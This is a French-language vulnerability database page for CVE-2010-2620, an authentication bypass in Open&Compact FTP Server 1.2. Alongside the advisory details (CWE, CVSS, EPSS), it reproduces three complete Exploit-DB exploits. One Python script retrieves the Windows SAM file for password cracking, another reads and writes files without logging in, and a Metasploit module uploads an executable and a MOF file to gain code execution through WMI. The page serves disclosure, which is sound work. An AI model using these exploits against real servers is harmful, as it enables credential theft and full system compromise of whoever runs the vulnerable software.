CVE-2010-2620 : Détail

CVE-2010-2620

Authorization problems
A07-Identif. and Authent. Fail
44.28%V3
Network
2010-07-02
20h00 +00:00
2024-09-16
20h02 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Open&Compact FTP Server (Open-FTPD) 1.2 and earlier allows remote attackers to bypass authentication by sending (1) LIST, (2) RETR, (3) STOR, or other commands without performing the required login steps first.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-287 Improper Authentication
When an actor claims to have a given identity, the product does not prove or insufficiently proves that the claim is correct.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 9.3 AV:N/AC:M/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 27401

Date de publication : 2013-08-06 22h00 +00:00
Auteur : Wireghoul
EDB Vérifié : Yes

#!/usr/bin/python # Exploit Title: Open&Compact Ftp Server <= 1.2 Auth bypass & directory traversal sam retrieval # Date: Aug 7, 2013 # By Wireghoul - http://www.justanotherhacker.com # Based on Serge Gorbunov's auth bypass (http://www.exploit-db.com/exploits/13932/) # Software Link: http://sourceforge.net/projects/open-ftpd/ # Version: <= 1.2 # Tested on: Windows 7, Windows XP SP3 # Abusing authentication bypass in combination with a directory traversal to grab # the sam file for offline cracking import ftplib import os # Connect to server ftp = ftplib.FTP( "192.168.58.135" ) ftp.set_pasv( False ) # Note that we need no authentication at all!! print ftp.sendcmd( 'CWD C:\\\\windows\\\\repair\\\\' ) print ftp.retrbinary('RETR sam', open('sam', 'wb').write ) ftp.quit()
Exploit Database EDB-ID : 13932

Date de publication : 2010-06-17 22h00 +00:00
Auteur : Serge Gorbunov
EDB Vérifié : Yes

# Exploit Title: Open&Compact Ftp Server <= 1.2 Full System Access # Date: June 12, 2010 # Author: Serge Gorbunov # Software Link: http://sourceforge.net/projects/open-ftpd/ # Version: <= 1.2 # Tested on: Windows 7, Windows XP SP3 #!/usr/bin/python # Simply by omitting login process to the open ftp server it is possible # to execute any command, including but not limited to: listing files, # retrieving files, storing files. # Below is an example of a few commands. # If you want to test storing files with no authentication, create a # test file and uncomment out line with ftp.storbinary function call. # Any command will work as long as there is at least on user who has the permission # to execute that command. For example, storing files will work as long # as there is one user with write permission. No matter whom it is. import ftplib import os # Connect to server ftp = ftplib.FTP( "127.0.0.1" ) ftp.set_pasv( False ) # Note that we need no authentication at all!! print ftp.retrlines( 'LIST' ) print ftp.retrbinary('RETR changelog.txt', open('changelog.txt', 'wb').write ) # filename = 'test.txt' # f = open( filename, 'rb' ) # print ftp.storbinary( 'STOR ' + filename, f ) # f.close() ftp.quit()
Exploit Database EDB-ID : 27556

Date de publication : 2013-08-12 22h00 +00:00
Auteur : Metasploit
EDB Vérifié : Yes

## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Ftp include Msf::Exploit::Remote::TcpServer include Msf::Exploit::EXE include Msf::Exploit::WbemExec include Msf::Exploit::FileDropper def initialize(info={}) super(update_info(info, 'Name' => "Open-FTPD 1.2 Arbitrary File Upload", 'Description' => %q{ This module exploits multiple vulnerabilities found in Open&Compact FTP server. The software contains an authentication bypass vulnerability and a arbitrary file upload vulnerability that allows a remote attacker to write arbitrary files to the file system as long as there is at least one user who has permission. Code execution can be achieved by first uploading the payload to the remote machine as an exe file, and then upload another mof file, which enables WMI (Management Instrumentation service) to execute the uploaded payload. Please note that this module currently only works for Windows before Vista. }, 'License' => MSF_LICENSE, 'Author' => [ 'Serge Gorbunov', # Initial discovery 'Brendan Coles <bcoles[at]gmail.com>', # Metasploit ], 'References' => [ ['OSVDB', '65687'], ['EDB', '13932'], ['CVE', '2010-2620'] ], 'Payload' => { 'BadChars' => "\x00", }, 'Platform' => 'win', 'Stance' => Msf::Exploit::Stance::Aggressive, 'Targets' => [ # Tested on version 1.2 - Windows XP SP3 (EN) ['Open&Compact FTP 1.2 on Windows (Before Vista)', {}] ], 'Privileged' => true, 'DisclosureDate' => "Jun 18 2012", 'DefaultTarget' => 0)) register_options([ OptString.new('PATH', [true, 'The local Windows path', "C:/WINDOWS/"]), OptPort.new('SRVPORT', [true, 'The local port to listen on for active mode', 8080]) ], self.class) deregister_options('FTPUSER', 'FTPPASS') # Using authentication bypass end def check connect disconnect if banner =~ /\*\* Welcome on \*\*/ return Exploit::CheckCode::Vulnerable else return Exploit::CheckCode::Unknown end end def on_client_connect(cli) peer = "#{cli.peerhost}:#{cli.peerport}" case @stage when :exe print_status("#{peer} - Sending executable (#{@exe.length.to_s} bytes)") cli.put(@exe) @stage = :mof when :mof print_status("#{peer} - Sending MOF (#{@mof.length.to_s} bytes)") cli.put(@mof) end cli.close end # Largely stolen from freefloatftp_wbem.rb def upload(filename) select(nil, nil, nil, 1) peer = "#{rhost}:#{rport}" print_status("#{peer} - Trying to upload #{::File.basename(filename)}") conn = connect(false, datastore['VERBOSE']) if not conn fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed") end # Switch to binary mode print_status("#{peer} - Set binary mode") send_cmd(['TYPE', 'I'], true, conn) # Prepare active mode: Get attacker's IP and source port src_ip = datastore['SRVHOST'] == '0.0.0.0' ? Rex::Socket.source_address : datastore['SRVHOST'] src_port = datastore['SRVPORT'].to_i # Prepare active mode: Convert the IP and port for active mode src_ip = src_ip.gsub(/\./, ',') src_port = "#{src_port/256},#{src_port.remainder(256)}" # Set to active mode print_status("#{peer} - Set active mode \"#{src_ip},#{src_port}\"") send_cmd(['PORT', "#{src_ip},#{src_port}"], true, conn) # Tell the FTP server to download our file send_cmd(['STOR', filename], false, conn) print_good("#{peer} - Upload successful") disconnect(conn) end # Largely stolen from freefloatftp_wbem.rb def exploit path = datastore['PATH'] exe_name = "#{path}/system32/#{rand_text_alpha(rand(10)+5)}.exe" mof_name = "#{path}/system32/wbem/mof/#{rand_text_alpha(rand(10)+5)}.mof" @mof = generate_mof(::File.basename(mof_name), ::File.basename(exe_name)) @exe = generate_payload_exe @stage = :exe begin t = framework.threads.spawn("reqs", false) { # Upload our malicious executable u = upload(exe_name) # Upload the mof file upload(mof_name) if u register_file_for_cleanup("#{::File.basename(exe_name)}") register_file_for_cleanup("wbem\\mof\\good\\#{::File.basename(mof_name)}") } super ensure t.kill end end end

Products Mentioned

Configuraton 0

Open-ftpd>>Open-ftpd >> Version To (including) 1.2

    Open-ftpd>>Open-ftpd >> Version 1.0

      Références

      http://secunia.com/advisories/40284
      Tags : third-party-advisory, x_refsource_SECUNIA
      http://www.exploit-db.com/exploits/13932
      Tags : exploit, x_refsource_EXPLOIT-DB